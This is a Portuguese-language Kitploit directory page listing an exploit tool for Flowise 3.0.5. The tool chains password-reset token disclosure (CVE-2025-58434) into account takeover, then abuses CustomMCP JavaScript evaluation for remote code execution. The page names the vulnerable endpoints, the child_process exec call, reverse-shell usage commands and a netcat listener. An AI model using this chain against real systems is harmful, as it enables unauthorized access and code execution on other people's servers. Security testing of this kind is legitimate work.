Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/r3vpwnx/cve-2025-58434
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAutenticaçãoRed Teaming
GitHubr3vpwnx/cve-2025-58434

CVE-2025-58434

Cadeia de exploração para Flowise 3.0.5: tomada de conta não autenticada via divulgação de token de redefinição de senha (CVE-2025-58434) encadeada com avaliação de JavaScript CustomMCP para execução remota de código.

Ver Repositório
1há 1 diaAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-58434 - Assunção de conta não autenticada no Flowise, encadeada com RCE via CustomMCP

Dois problemas no Flowise 3.0.5, encadeados:

  1. CVE-2025-58434 - divulgação do token de redefinição de senha. POST /api/v1/account/forgot-password retorna o tempToken do usuário-alvo diretamente na resposta JSON. Envie-o para POST /api/v1/account/reset-password para definir uma senha conhecida para qualquer conta, incluindo o primeiro admin -> assunção total de conta não autenticada.
  2. Avaliação de JavaScript no servidor via mcpServerConfig do CustomMCP. Com uma sessão e chave de API do workspace (do passo 1), POST /api/v1/node-load-method/customMCP com loadMethod=listActions avalia a string mcpServerConfig como JavaScript no processo do Flowise, permitindo RCE via . (Problema separado do Flowise usado aqui apenas para transformar a ATO em execução de código; nenhum CVE atribuído no momento da escrita.)
require('child_process').exec()

CVE: CVE-2025-58434

Requisitos

root@kitploit:~
python3 -m pip install requests

Uso

flowise_ato_foothold.py - cadeia completa (ATO -> chave de API -> reverse shell via CustomMCP)

root@kitploit:~
python3 flowise_ato_foothold.py <LHOST> <LPORT> [TARGET_IP] [FLOWISE_VHOST]
# tenha `nc -lvnp <LPORT>` pronto

flowise_customMCP_rce.py - apenas RCE via CustomMCP (requer uma chave de API)

root@kitploit:~
python3 flowise_customMCP_rce.py '<comando>' '<FLOWISE_API_KEY>'

Referências

  • https://github.com/FlowiseAI/Flowise/security/advisories
  • NVD: CVE-2025-58434

Aviso legal

Apenas para testes de segurança autorizados e fins educacionais. Execute isso somente contra sistemas que você possui ou para os quais tem permissão explícita por escrito para testar.


Autor: r3vpwnx

Baixar ferramenta